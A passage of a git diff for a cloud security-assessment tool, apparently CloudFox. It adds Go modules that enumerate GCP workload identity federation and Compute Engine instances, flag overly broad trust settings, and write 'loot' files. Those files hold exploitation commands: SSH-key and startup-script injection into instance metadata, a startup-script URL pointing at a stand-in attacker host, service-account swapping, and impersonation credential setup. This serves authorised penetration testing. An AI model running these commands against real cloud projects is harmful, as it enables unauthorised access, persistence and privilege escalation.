projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n"+ + "# --output-file=gcp-creds.json\n\n", + provider.ProjectID, provider.PoolID, provider.ProviderID, + ) + } + } +} + +func (m *IdentityFederationModule) addFederatedBindingToLoot(projectID string, binding workloadidentityservice.FederatedIdentityBinding) { + lootFile := m.LootMap[projectID]["identity-federation-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# FEDERATED BINDING\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Pool: %s\n"+ + "# GCP Service Account: %s\n"+ + "# External Subject: %s\n\n", + binding.PoolID, + binding.GCPServiceAccount, + binding.ExternalSubject, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *IdentityFederationModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *IdentityFederationModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectPools { + tables := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = IdentityFederationOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *IdentityFederationModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allPools := m.getAllPools() + allProviders := m.getAllProviders() + allFederatedBindings := m.getAllFederatedBindings() + + tables := m.buildTables(allPools, allProviders, allFederatedBindings) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := IdentityFederationOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables for a specific project +func (m *IdentityFederationModule) buildTablesForProject(projectID string) []internal.TableFile { + pools := m.ProjectPools[projectID] + providers := m.ProjectProviders[projectID] + federatedBindings := m.ProjectFederatedBindings[projectID] + return m.buildTables(pools, providers, federatedBindings) +} + +// buildTables builds all tables from the given data +func (m *IdentityFederationModule) buildTables( + pools []workloadidentityservice.WorkloadIdentityPool, + providers []workloadidentityservice.WorkloadIdentityProvider, + federatedBindings []workloadidentityservice.FederatedIdentityBinding, +) []internal.TableFile { + var tables []internal.TableFile + + // Pools table + if len(pools) > 0 { + poolsHeader := []string{ + "Project", + "Pool ID", + "Display Name", + "State", + "Disabled", + } + + var poolsBody [][]string + for _, pool := range pools { + disabled := "No" + if pool.Disabled { + disabled = "Yes" + } + poolsBody = append(poolsBody, []string{ + m.GetProjectName(pool.ProjectID), + pool.PoolID, + pool.DisplayName, + pool.State, + disabled, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "identity-federation-pools", + Header: poolsHeader, + Body: poolsBody, + }) + } + + // Providers table + if len(providers) > 0 { + providersHeader := []string{ + "Project", + "Pool", + "Provider", + "Type", + "OIDC Issuer / AWS Account", + "Trust Scope", + "Access Condition", + } + + var providersBody [][]string + for _, p := range providers { + issuerOrAccount := "-" + if p.ProviderType == "AWS" { + issuerOrAccount = p.AWSAccountID + } else if p.ProviderType == "OIDC" { + issuerOrAccount = p.OIDCIssuerURI + } + + attrCond := "NONE" + if p.AttributeCondition != "" { + attrCond = p.AttributeCondition + } + + trustScope := analyzeTrustScope(p) + + providersBody = append(providersBody, []string{ + m.GetProjectName(p.ProjectID), + p.PoolID, + p.ProviderID, + p.ProviderType, + issuerOrAccount, + trustScope, + attrCond, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "identity-federation-providers", + Header: providersHeader, + Body: providersBody, + }) + } + + // Federated bindings table + if len(federatedBindings) > 0 { + fedBindingsHeader := []string{ + "Project", + "Pool", + "GCP Service Account", + "External Identity", + "SA Attack Paths", + } + + var fedBindingsBody [][]string + for _, fb := range federatedBindings { + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, fb.GCPServiceAccount) + + fedBindingsBody = append(fedBindingsBody, []string{ + m.GetProjectName(fb.ProjectID), + fb.PoolID, + fb.GCPServiceAccount, + fb.ExternalSubject, + attackPaths, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "identity-federation-bindings", + Header: fedBindingsHeader, + Body: fedBindingsBody, + }) + } + + return tables +} + +// analyzeTrustScope examines a provider's configuration and returns a human-readable +// summary of how broad the trust is. Flags overly permissive configurations. +func analyzeTrustScope(p workloadidentityservice.WorkloadIdentityProvider) string { + // No attribute condition = any identity from this provider + if p.AttributeCondition == "" { + switch p.ProviderType { + case "AWS": + return "BROAD: Any role in AWS account " + p.AWSAccountID + case "OIDC": + return "BROAD: Any identity from issuer" + case "SAML": + return "BROAD: Any SAML assertion" + default: + return "BROAD: No condition set" + } + } + + cond := p.AttributeCondition + var issues []string + + // Check for wildcard patterns in the condition + if strings.Contains(cond, `"*"`) || strings.Contains(cond, `'*'`) { + issues = append(issues, "wildcard (*) in condition") + } + + // GitHub Actions specific analysis + if p.ProviderType == "OIDC" && strings.Contains(p.OIDCIssuerURI, "github") { + // Check if repo is scoped + if !strings.Contains(cond, "repository") && !strings.Contains(cond, "repo") { + issues = append(issues, "no repo restriction") + } + + // Check if branch/ref is scoped + if strings.Contains(cond, "repository") || strings.Contains(cond, "repo") { + if !strings.Contains(cond, "ref") && !strings.Contains(cond, "branch") { + issues = append(issues, "no branch restriction") + } + } + + // Check for org-wide trust (repo starts with org/) + if strings.Contains(cond, ".startsWith(") { + issues = append(issues, "prefix match (org-wide?)") + } + } + + // GitLab CI specific analysis + if p.ProviderType == "OIDC" && strings.Contains(p.OIDCIssuerURI, "gitlab") { + if !strings.Contains(cond, "project_path") && !strings.Contains(cond, "namespace_path") { + issues = append(issues, "no project restriction") + } + if !strings.Contains(cond, "ref") && !strings.Contains(cond, "branch") { + issues = append(issues, "no branch restriction") + } + } + + // AWS specific analysis + if p.ProviderType == "AWS" { + if !strings.Contains(cond, "arn") && !strings.Contains(cond, "account") { + issues = append(issues, "no role/account restriction") + } + } + + if len(issues) > 0 { + return "BROAD: " + strings.Join(issues, ", ") + } + + return "Scoped" +} diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 79334951..7cd9d8de 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -1,126 +1,994 @@ package commands import ( + "context" + "encoding/json" "fmt" + "sort" + "strings" + "sync" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) var GCPInstancesCommand = &cobra.Command{ - Use: globals.GCP_INSTANCES_MODULE_NAME, // This should be defined in the globals package - Aliases: []string{}, - Short: "Display GCP Compute Engine instances information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available Compute Engine instances information: -cloudfox gcp instances`, + Use: globals.GCP_INSTANCES_MODULE_NAME, + Aliases: []string{"vms", "compute", "ssh", "oslogin"}, + Short: "Enumerate GCP Compute Engine instances with security configuration", + Long: `Enumerate GCP Compute Engine instances across projects with security-relevant details. + +Features: +- Lists all instances with network and security configuration +- Shows attached service accounts and their scopes +- Identifies instances with default service accounts or broad scopes +- Shows Shielded VM, Secure Boot, and Confidential VM status +- Shows OS Login configuration (enabled, 2FA, block project keys) +- Shows serial port and disk encryption configuration +- Extracts SSH keys from project and instance metadata +- Extracts startup scripts (may contain secrets) +- Generates gcloud commands for instance access and exploitation + +Security Columns: +- ExternalIP: Instances with external IPs are internet-accessible +- DefaultSA: Uses default compute service account (security risk) +- BroadScopes: Has cloud-platform or other broad OAuth scopes +- OSLogin: OS Login enabled (recommended for access control) +- OSLogin2FA: OS Login with 2FA required +- BlockProjKeys: Instance blocks project-wide SSH keys +- SerialPort: Serial port access enabled (security risk if exposed) +- CanIPForward: Can forward packets (potential for lateral movement) +- ShieldedVM/SecureBoot/vTPM/Integrity: Hardware security features +- Confidential: Confidential computing enabled +- Encryption: Boot disk encryption type (Google-managed, CMEK, CSEK)`, Run: runGCPInstancesCommand, } -// GCPInstancesResults implements internal.OutputInterface for Compute Engine instances -type GCPInstancesResults struct { - Data []ComputeEngineService.ComputeEngineInfo +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type InstancesModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectInstances map[string][]ComputeEngineService.ComputeEngineInfo // projectID -> instances + ProjectMetadata map[string]*ComputeEngineService.ProjectMetadataInfo // projectID -> metadata + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type InstancesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile } -func (g GCPInstancesResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +func (o InstancesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o InstancesOutput) LootFiles() []internal.LootFile { return o.Loot } - header := []string{ - "Name", - "ID", - "State", - "ExternalIP", - "InternalIP", - "ServiceAccount", // Adding ServiceAccount to the header - "Zone", - "ProjectID", +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPInstancesCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_INSTANCES_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string - for _, instance := range g.Data { - // Initialize an empty string to aggregate service account emails - var serviceAccountEmails string - for _, serviceAccount := range instance.ServiceAccounts { - // Assuming each instance can have multiple service accounts, concatenate their emails - if serviceAccountEmails != "" { - serviceAccountEmails += "; " // Use semicolon as a delimiter for multiple emails + // Create module instance + module := &InstancesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]ComputeEngineService.ComputeEngineInfo), + ProjectMetadata: make(map[string]*ComputeEngineService.ProjectMetadataInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *InstancesModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_INSTANCES_MODULE_NAME) + } + + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_INSTANCES_MODULE_NAME, m.processProject) + + // Get all instances for stats + allInstances := m.getAllInstances() + if len(allInstances) == 0 { + logger.InfoM("No instances found", globals.GCP_INSTANCES_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(allInstances)), globals.GCP_INSTANCES_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// getAllInstances returns all instances from all projects (for statistics) +func (m *InstancesModule) getAllInstances() []ComputeEngineService.ComputeEngineInfo { + var all []ComputeEngineService.ComputeEngineInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *InstancesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating instances in project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) + } + + // Create service and fetch instances with project metadata + ces := ComputeEngineService.New() + instances, projectMeta, err := ces.InstancesWithMetadata(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_INSTANCES_MODULE_NAME, + fmt.Sprintf("Could not enumerate instances in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectInstances[projectID] = instances + m.ProjectMetadata[projectID] = projectMeta + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["instances-commands"] = &internal.LootFile{ + Name: "instances-commands", + Contents: "# GCP Compute Engine Instance Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["instances-metadata"] = &internal.LootFile{ + Name: "instances-metadata", + Contents: "", + } + m.LootMap[projectID]["instances-ssh-keys"] = &internal.LootFile{ + Name: "instances-ssh-keys", + Contents: "# GCP Compute Engine SSH Keys\n# Generated by CloudFox\n# Format: user:key-type KEY comment\n\n", + } + } + + // Generate loot for each instance + for _, instance := range instances { + m.addInstanceToLoot(projectID, instance) + m.addInstanceMetadataToLoot(projectID, instance) + m.addInstanceSSHKeysToLoot(projectID, instance) + } + + // Add project metadata to loot + m.addProjectMetadataToLoot(projectID, projectMeta) + m.addProjectMetadataFullToLoot(projectID, projectMeta) + m.addProjectSSHKeysToLoot(projectID, projectMeta) + + // Log sensitive metadata findings + if projectMeta != nil && len(projectMeta.SensitiveMetadata) > 0 { + logger.InfoM(fmt.Sprintf("Found %d sensitive metadata item(s) in project %s metadata", len(projectMeta.SensitiveMetadata), projectID), globals.GCP_INSTANCES_MODULE_NAME) + } + for _, inst := range instances { + if len(inst.SensitiveMetadata) > 0 { + logger.InfoM(fmt.Sprintf("Found %d sensitive metadata item(s) in instance %s", len(inst.SensitiveMetadata), inst.Name), globals.GCP_INSTANCES_MODULE_NAME) + } + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) in project %s", len(instances), projectID), globals.GCP_INSTANCES_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ + +// addProjectMetadataToLoot adds project metadata commands to the commands loot file +func (m *InstancesModule) addProjectMetadataToLoot(projectID string, meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil { + return + } + + lootFile := m.LootMap[projectID]["instances-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PROJECT-LEVEL COMMANDS (Project: %s)\n"+ + "# =============================================================================\n\n", + meta.ProjectID, + ) + + // --- PROJECT ENUMERATION --- + lootFile.Contents += "# === PROJECT ENUMERATION ===\n\n" + lootFile.Contents += fmt.Sprintf( + "gcloud compute project-info describe --project=%s\n"+ + "gcloud compute project-info describe --project=%s --format='yaml(commonInstanceMetadata)'\n"+ + "gcloud compute project-info describe --project=%s --format='value(commonInstanceMetadata.items)'\n", + meta.ProjectID, meta.ProjectID, meta.ProjectID, + ) + + // Add commands for specific project metadata keys + for key := range meta.RawMetadata { + lootFile.Contents += fmt.Sprintf( + "gcloud compute project-info describe --project=%s --format='value(commonInstanceMetadata.items.filter(key:%s).extract(value).flatten())'\n", + meta.ProjectID, key, + ) + } + + // --- PROJECT-LEVEL EXPLOITATION --- + lootFile.Contents += "\n# === PROJECT-LEVEL EXPLOITATION ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# Add project-wide SSH key (applies to all instances not blocking project keys)\n"+ + "gcloud compute project-info add-metadata --project=%s --metadata=ssh-keys='USERNAME:SSH_PUBLIC_KEY'\n"+ + "# Add project-wide startup script\n"+ + "gcloud compute project-info add-metadata --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n"+ + "# Enable OS Login project-wide\n"+ + "gcloud compute project-info add-metadata --project=%s --metadata=enable-oslogin=TRUE\n", + meta.ProjectID, meta.ProjectID, meta.ProjectID, + ) + + lootFile.Contents += "\n" +} + +// addProjectMetadataFullToLoot adds full project metadata to the metadata loot file +func (m *InstancesModule) addProjectMetadataFullToLoot(projectID string, meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil { + return + } + + lootFile := m.LootMap[projectID]["instances-metadata"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PROJECT METADATA: %s\n"+ + "# =============================================================================\n\n", + meta.ProjectID, + ) + + // Output all raw metadata as JSON for completeness + if len(meta.RawMetadata) > 0 { + // Sort keys for consistent output + var keys []string + for k := range meta.RawMetadata { + keys = append(keys, k) + } + sort.Strings(keys) + + for _, key := range keys { + value := meta.RawMetadata[key] + lootFile.Contents += fmt.Sprintf("--- %s ---\n%s\n\n", key, value) + } + } else { + lootFile.Contents += "(No project-level metadata found)\n\n" + } +} + +// addInstanceToLoot adds instance commands to the commands loot file +func (m *InstancesModule) addInstanceToLoot(projectID string, instance ComputeEngineService.ComputeEngineInfo) { + lootFile := m.LootMap[projectID]["instances-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# INSTANCE: %s (Zone: %s)\n"+ + "# =============================================================================\n\n", + instance.Name, instance.Zone, + ) + + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "gcloud compute instances describe %s --zone=%s --project=%s\n"+ + "gcloud compute instances get-iam-policy %s --zone=%s --project=%s\n"+ + "gcloud compute instances get-serial-port-output %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + lootFile.Contents += "\n# === METADATA ENUMERATION ===\n\n" + lootFile.Contents += fmt.Sprintf( + "gcloud compute instances describe %s --zone=%s --project=%s --format='value(metadata.items)'\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // Add commands for specific metadata keys found + for key := range instance.RawMetadata { + lootFile.Contents += fmt.Sprintf( + "gcloud compute instances describe %s --zone=%s --project=%s --format='value(metadata.items.filter(key:%s).extract(value).flatten())'\n", + instance.Name, instance.Zone, instance.ProjectID, key, + ) + } + + lootFile.Contents += "\n# === CODE EXECUTION / ACCESS ===\n\n" + + // SSH with external IP + if instance.ExternalIP != "" { + lootFile.Contents += fmt.Sprintf( + "# SSH (external IP available)\n"+ + "gcloud compute ssh %s --zone=%s --project=%s\n"+ + "gcloud compute ssh %s --zone=%s --project=%s --command='id && hostname'\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + } + + // SSH via IAP tunnel (always an option) + lootFile.Contents += fmt.Sprintf( + "# SSH via IAP tunnel\n"+ + "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap\n"+ + "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap --command='id && hostname'\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + // OS Login (if enabled) + if instance.OSLoginEnabled { + lootFile.Contents += fmt.Sprintf( + "# OS Login (enabled on this instance)\n"+ + "gcloud compute os-login ssh-keys add --key-file=~/.ssh/id_rsa.pub\n"+ + "gcloud compute ssh %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + } + + // Serial console + lootFile.Contents += fmt.Sprintf( + "# Serial console access\n"+ + "gcloud compute connect-to-serial-port %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // SCP file transfer + lootFile.Contents += fmt.Sprintf( + "# SCP file transfer\n"+ + "gcloud compute scp LOCAL_FILE %s:REMOTE_PATH --zone=%s --project=%s\n"+ + "gcloud compute scp %s:REMOTE_PATH LOCAL_FILE --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + + // Startup script injection + lootFile.Contents += fmt.Sprintf( + "# Add startup script (runs on next boot)\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n"+ + "# Add startup script from URL\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script-url=http://ATTACKER/script.sh\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + // SSH key injection + lootFile.Contents += fmt.Sprintf( + "# Inject SSH key via metadata\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=ssh-keys='USERNAME:SSH_PUBLIC_KEY'\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // Reset instance (to trigger startup script) + lootFile.Contents += fmt.Sprintf( + "# Reset instance (triggers startup script)\n"+ + "gcloud compute instances reset %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // Set service account + lootFile.Contents += fmt.Sprintf( + "# Change service account (requires stop first)\n"+ + "gcloud compute instances stop %s --zone=%s --project=%s\n"+ + "gcloud compute instances set-service-account %s --zone=%s --project=%s --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com --scopes=cloud-platform\n"+ + "gcloud compute instances start %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + lootFile.Contents += "\n" +} + +// addInstanceMetadataToLoot adds full instance metadata to the metadata loot file +func (m *InstancesModule) addInstanceMetadataToLoot(projectID string, instance ComputeEngineService.ComputeEngineInfo) { + lootFile := m.LootMap[projectID]["instances-metadata"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# INSTANCE: %s (Zone: %s)\n"+ + "# =============================================================================\n\n", + instance.Name, instance.Zone, + ) + + // Output all raw metadata + if len(instance.RawMetadata) > 0 { + // Sort keys for consistent output + var keys []string + for k := range instance.RawMetadata { + keys = append(keys, k) + } + sort.Strings(keys) + + for _, key := range keys { + value := instance.RawMetadata[key] + lootFile.Contents += fmt.Sprintf("--- %s ---\n%s\n\n", key, value) + } + } else { + lootFile.Contents += "(No instance-level metadata found)\n\n" + } + + // Also output as JSON for programmatic use + if len(instance.RawMetadata) > 0 { + lootFile.Contents += "--- RAW JSON ---\n" + jsonBytes, err := json.MarshalIndent(instance.RawMetadata, "", " ") + if err == nil { + lootFile.Contents += string(jsonBytes) + "\n\n" + } + } +} + +// addInstanceSSHKeysToLoot adds instance SSH keys to the SSH keys loot file +func (m *InstancesModule) addInstanceSSHKeysToLoot(projectID string, instance ComputeEngineService.ComputeEngineInfo) { + if len(instance.SSHKeys) == 0 { + return + } + + lootFile := m.LootMap[projectID]["instances-ssh-keys"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# INSTANCE: %s (Zone: %s)\n"+ + "# =============================================================================\n", + instance.Name, instance.Zone, + ) + + for _, key := range instance.SSHKeys { + lootFile.Contents += key + "\n" + } + lootFile.Contents += "\n" +} + +// addProjectSSHKeysToLoot adds project-level SSH keys to the SSH keys loot file +func (m *InstancesModule) addProjectSSHKeysToLoot(projectID string, meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil || len(meta.ProjectSSHKeys) == 0 { + return + } + + lootFile := m.LootMap[projectID]["instances-ssh-keys"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PROJECT-LEVEL SSH KEYS (apply to all instances not blocking project keys)\n"+ + "# =============================================================================\n", + ) + + for _, key := range meta.ProjectSSHKeys { + lootFile.Contents += key + "\n" + } + lootFile.Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *InstancesModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getInstancesTableHeader() + sensitiveMetadataHeader := m.getSensitiveMetadataTableHeader() + sshKeysHeader := m.getSSHKeysTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, instances := range m.ProjectInstances { + body := m.instancesToTableBody(instances) + tables := []internal.TableFile{{ + Name: globals.GCP_INSTANCES_MODULE_NAME, + Header: header, + Body: body, + }} + + // Build sensitive metadata table for this project + sensitiveBody := m.buildSensitiveMetadataTableForProject(projectID, instances) + if len(sensitiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "instances-sensitive-metadata", + Header: sensitiveMetadataHeader, + Body: sensitiveBody, + }) + } + + // Build SSH keys table for this project + sshKeysBody := m.buildSSHKeysTableForProject(projectID, instances) + if len(sshKeysBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "instances-ssh-keys", + Header: sshKeysHeader, + Body: sshKeysBody, + }) + } + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } - serviceAccountEmails += serviceAccount.Email } - body = append(body, []string{ - instance.Name, - instance.ID, - instance.State, - instance.ExternalIP, - instance.InternalIP, - serviceAccountEmails, // Add the aggregated service account emails to the output - instance.Zone, - instance.ProjectID, - }) + outputData.ProjectLevelData[projectID] = InstancesOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_INSTANCES_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *InstancesModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getInstancesTableHeader() + sensitiveMetadataHeader := m.getSensitiveMetadataTableHeader() + sshKeysHeader := m.getSSHKeysTableHeader() + + allInstances := m.getAllInstances() + body := m.instancesToTableBody(allInstances) + + // Build sensitive metadata table for all projects + var sensitiveBody [][]string + // Build SSH keys table for all projects + var sshKeysBody [][]string + for projectID, instances := range m.ProjectInstances { + sensitiveBody = append(sensitiveBody, m.buildSensitiveMetadataTableForProject(projectID, instances)...) + sshKeysBody = append(sshKeysBody, m.buildSSHKeysTableForProject(projectID, instances)...) + } + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } - tableFiles = append(tableFiles, internal.TableFile{ + // Build table files + tableFiles := []internal.TableFile{{ Name: globals.GCP_INSTANCES_MODULE_NAME, Header: header, Body: body, - }) + }} + + // Add sensitive metadata table if there are any findings + if len(sensitiveBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-sensitive-metadata", + Header: sensitiveMetadataHeader, + Body: sensitiveBody, + }) + } + + // Add SSH keys table if there are any + if len(sshKeysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-ssh-keys", + Header: sshKeysHeader, + Body: sshKeysBody, + }) + } + + output := InstancesOutput{ + Table: tableFiles, + Loot: lootFiles, + } - return tableFiles + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_INSTANCES_MODULE_NAME) + m.CommandCounter.Error++ + } } -func (g GCPInstancesResults) 